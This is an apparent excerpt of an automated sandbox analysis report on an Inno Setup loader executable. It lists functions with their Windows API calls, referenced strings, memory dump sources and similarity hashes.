73A25CF0.USER32(00050440,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127

Strings

STATIC, xrefs: 0040A009
/SL5="$%x,%d,%d,, xrefs: 0040A067
InnoSetupLdrWindow, xrefs: 0040A004

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 978128352-3001827809
Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409FD8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,01F42C78), ref: 00409484

CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
SetWindowLongA.USER32(00050440,000000FC,004097FC), ref: 0040A027

Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4

Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974,00000000,0040995B), ref: 004098F8
Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974,00000000), ref: 0040990C
Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974), ref: 00409940

RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
73A25CF0.USER32(00050440,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127

Strings

STATIC, xrefs: 0040A009
/SL5="$%x,%d,%d,, xrefs: 0040A067
InnoSetupLdrWindow, xrefs: 0040A004

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 240127915-3001827809
Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00409888 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974,00000000,0040995B), ref: 004098F8
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974,00000000), ref: 0040990C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,01F42C78,00409974), ref: 00409940

Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,01F42C78), ref: 00409484

Strings

D, xrefs: 004098D2

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
String ID: D
API String ID: 3356880605-2746444292
Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669

Uniqueness

Uniqueness Score: -1.00%

Function 00409A14 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?), ref: 00409A26
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409A31
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409A72
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409AA4
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409AB4

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
Instruction ID: 05782b2e5a8588c9c74d05110837466633af9a4b7a19298b20ab433fd050a55e
Opcode Fuzzy Hash: c2769086b94dacb7810d1409196c7497058a42c32b70979fc979e51038c0ff67
Instruction Fuzzy Hash: D0216FB13003846BD6309A698C85E67B7DC9F85360F18492AFA85E62C3D73DED40CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409D26 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A

Strings

.tmp, xrefs: 00409DD0
$u@, xrefs: 00409E3E

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: Message
String ID: $u@$.tmp
API String ID: 2030045667-236237750
Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409D41 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A

Strings

.tmp, xrefs: 00409DD0
$u@, xrefs: 00409E3E

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: Message
String ID: $u@$.tmp
API String ID: 2030045667-236237750
Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3

Strings

.tmp, xrefs: 00409283

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406F00 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406F0A
LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568

Uniqueness

Uniqueness Score: -1.00%

Function 004075CC Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,01F403AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6

Uniqueness

Uniqueness Score: -1.00%

Function 0040758C Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B

Uniqueness

Uniqueness Score: -1.00%

Function 00407524 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,01F403AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766

Uniqueness

Uniqueness Score: -1.00%

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Uniqueness

Uniqueness Score: -1.00%

Function 004051D0 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF

Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49

Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98

Uniqueness

Uniqueness Score: -1.00%

Function 004074D6 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Uniqueness

Uniqueness Score: -1.00%

Function 004074D8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040693C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568

Uniqueness

Uniqueness Score: -1.00%

Function 00407628 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,01F403AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676

Uniqueness

Uniqueness Score: -1.00%

Function 004071E4 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.2875251103.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875849422.000000000040B000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000B.00000002.2875962977.0000000000411000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_Y8KGRj_sUjw5KjZpIoRDoSwV.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040760C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,01F58000,00409F6B,00000000), ref: 00407613

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,01F403AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 0000000B.00000002.2875665347.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

